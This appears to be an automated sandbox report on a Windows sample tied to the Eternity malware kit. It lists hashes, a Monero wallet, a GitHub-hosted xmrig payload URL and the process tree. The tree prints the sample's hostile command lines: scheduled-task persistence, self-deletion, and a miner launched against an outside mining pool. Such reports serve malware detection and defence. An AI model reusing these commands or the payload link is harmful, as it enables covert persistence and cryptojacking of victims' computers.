Analysis
-
max time kernel
148s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system -
submitted
26-11-2023 16:43
Behavioral task
behavioral1
Sample
0x0003000000000737-1039.exe
Resource
win7-20231020-en
General
-
Target
0x0003000000000737-1039.exe
-
Size
14KB
-
MD5
a922561dc3eb681a439a93b07257f606
-
SHA1
ed45d4bfcdcfcc226bd6e66ce772f3c20b7e8241
-
SHA256
a9744c5c29b2455061dabc72c660a9737bac2600ea2895d9d24c5099ff7d421b
-
SHA512
25d74be339bdd2fab4af1e52304a9c131271068baefde87a33d8a3df9160a0ea9f90358e4228faf79d8e97d2a7ffd9503122b18f238b3f470a956509608433d9
-
SSDEEP
384:frnPpyQr13n3KBIPVIJv9zo5+mbVjyN6Tw/j0asEkx:1qv9M/bM7Yaq
Malware Config
Extracted
eternity
47vk9PbPuHnEnazCn4tLpwPCWRLSMhpX9PD8WqpjchhTXisimD6j8EvRFDbPQHKUmHVq3vAM3DLytXLg8CqcdRXRFdPe92Q
-
payload_urls
https://raw.githubusercontent.com/VolVeRFM/SilentMiner-VolVeR/main/VolVeRBuilder/Resources/xmrig.exe
Signatures
-
Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral2/files/0x000b000000022d37-18.dat family_xmrig behavioral2/files/0x000b000000022d37-18.dat xmrig behavioral2/files/0x000b000000022d37-23.dat family_xmrig behavioral2/files/0x000b000000022d37-23.dat xmrig behavioral2/files/0x000b000000022d37-24.dat family_xmrig behavioral2/files/0x000b000000022d37-24.dat xmrig -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation 0x0003000000000737-1039.exe Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation 0x0003000000000737-1039.exe -
Executes dropped EXE 3 IoCs
pid Process 4124 0x0003000000000737-1039.exe 2428 Admin_QOLMEYBB.exe 628 0x0003000000000737-1039.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2960 schtasks.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2536 PING.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 660 Process not Found -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4124 0x0003000000000737-1039.exe Token: SeLockMemoryPrivilege 2428 Admin_QOLMEYBB.exe Token: SeLockMemoryPrivilege 2428 Admin_QOLMEYBB.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2428 Admin_QOLMEYBB.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 624 wrote to memory of 3468 624 0x0003000000000737-1039.exe 86 PID 624 wrote to memory of 3468 624 0x0003000000000737-1039.exe 86 PID 624 wrote to memory of 3468 624 0x0003000000000737-1039.exe 86 PID 3468 wrote to memory of 1288 3468 cmd.exe 88 PID 3468 wrote to memory of 1288 3468 cmd.exe 88 PID 3468 wrote to memory of 1288 3468 cmd.exe 88 PID 3468 wrote to memory of 2536 3468 cmd.exe 89 PID 3468 wrote to memory of 2536 3468 cmd.exe 89 PID 3468 wrote to memory of 2536 3468 cmd.exe 89 PID 3468 wrote to memory of 2960 3468 cmd.exe 94 PID 3468 wrote to memory of 2960 3468 cmd.exe 94 PID 3468 wrote to memory of 2960 3468 cmd.exe 94 PID 3468 wrote to memory of 4124 3468 cmd.exe 95 PID 3468 wrote to memory of 4124 3468 cmd.exe 95 PID 3468 wrote to memory of 4124 3468 cmd.exe 95 PID 4124 wrote to memory of 2428 4124 0x0003000000000737-1039.exe 97 PID 4124 wrote to memory of 2428 4124 0x0003000000000737-1039.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\0x0003000000000737-1039.exe"C:\Users\Admin\AppData\Local\Temp\0x0003000000000737-1039.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "0x0003000000000737-1039" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\0x0003000000000737-1039.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\0x0003000000000737-1039.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\0x0003000000000737-1039.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\SysWOW64\chcp.comchcp 650013⤵PID:1288
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
PID:2536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "0x0003000000000737-1039" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\0x0003000000000737-1039.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:2960
-
-
C:\Users\Admin\AppData\Local\ServiceHub\0x0003000000000737-1039.exe"C:\Users\Admin\AppData\Local\ServiceHub\0x0003000000000737-1039.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4124 -
C:\Users\Admin\AppData\Local\Temp\Admin_QOLMEYBB.exe"C:\Users\Admin\AppData\Local\Temp\Admin_QOLMEYBB.exe" -a cryptonight -o pool.supportxmr.com:3333 -u 47vk9PbPuHnEnazCn4tLpwPCWRLSMhpX9PD8WqpjchhTXisimD6j8EvRFDbPQHKUmHVq3vAM3DLytXLg8CqcdRXRFdPe92Q.Admin_QOLMEYBB -p x --max-cpu-usage=40 --donate-level=14⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2428
-
-
-
-
C:\Users\Admin\AppData\Local\ServiceHub\0x0003000000000737-1039.exeC:\Users\Admin\AppData\Local\ServiceHub\0x0003000000000737-1039.exe1⤵
- Executes dropped EXE
PID:628
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
321B
MD5baf5d1398fdb79e947b60fe51e45397f
SHA149e7b8389f47b93509d621b8030b75e96bb577af
SHA25610c8c7b5fa58f8c6b69f44e92a4e2af111b59fcf4f21a07e04b19e14876ccdf8
SHA512b2c9ef5581d5eae7c17ae260fe9f52344ed737fa851cb44d1cea58a32359d0ac5d0ca3099c970209bd30a0d4af6e504101f21b7054cf5eca91c0831cf12fb413
-
Filesize
14KB
MD5a922561dc3eb681a439a93b07257f606
SHA1ed45d4bfcdcfcc226bd6e66ce772f3c20b7e8241
SHA256a9744c5c29b2455061dabc72c660a9737bac2600ea2895d9d24c5099ff7d421b
SHA51225d74be339bdd2fab4af1e52304a9c131271068baefde87a33d8a3df9160a0ea9f90358e4228faf79d8e97d2a7ffd9503122b18f238b3f470a956509608433d9
-
Filesize
14KB
MD5a922561dc3eb681a439a93b07257f606
SHA1ed45d4bfcdcfcc226bd6e66ce772f3c20b7e8241
SHA256a9744c5c29b2455061dabc72c660a9737bac2600ea2895d9d24c5099ff7d421b
SHA51225d74be339bdd2fab4af1e52304a9c131271068baefde87a33d8a3df9160a0ea9f90358e4228faf79d8e97d2a7ffd9503122b18f238b3f470a956509608433d9
-
Filesize
14KB
MD5a922561dc3eb681a439a93b07257f606
SHA1ed45d4bfcdcfcc226bd6e66ce772f3c20b7e8241
SHA256a9744c5c29b2455061dabc72c660a9737bac2600ea2895d9d24c5099ff7d421b
SHA51225d74be339bdd2fab4af1e52304a9c131271068baefde87a33d8a3df9160a0ea9f90358e4228faf79d8e97d2a7ffd9503122b18f238b3f470a956509608433d9
-
Filesize
5.2MB
MD5606ce310d75ee688cbffaeae33ab4fee
SHA1b9aff434fd737d8009a8d92cd34b5e4c4c0117a8
SHA25675f92b9a79c8f680cf1230653e3ae6c97d694afc0f7eec88f92cf6b6f3f38b50
SHA512825e8b7d794fdfdb04b6f153eb220a45f12c4243d62d0d304744539d5f56cdfe660a78af150756d87ccfa0b0bbf73cdce5a35341120372012fdd9300ce2d5b63
-
Filesize
5.2MB
MD5606ce310d75ee688cbffaeae33ab4fee
SHA1b9aff434fd737d8009a8d92cd34b5e4c4c0117a8
SHA25675f92b9a79c8f680cf1230653e3ae6c97d694afc0f7eec88f92cf6b6f3f38b50
SHA512825e8b7d794fdfdb04b6f153eb220a45f12c4243d62d0d304744539d5f56cdfe660a78af150756d87ccfa0b0bbf73cdce5a35341120372012fdd9300ce2d5b63
-
Filesize
5.2MB
MD5606ce310d75ee688cbffaeae33ab4fee
SHA1b9aff434fd737d8009a8d92cd34b5e4c4c0117a8
SHA25675f92b9a79c8f680cf1230653e3ae6c97d694afc0f7eec88f92cf6b6f3f38b50
SHA512825e8b7d794fdfdb04b6f153eb220a45f12c4243d62d0d304744539d5f56cdfe660a78af150756d87ccfa0b0bbf73cdce5a35341120372012fdd9300ce2d5b63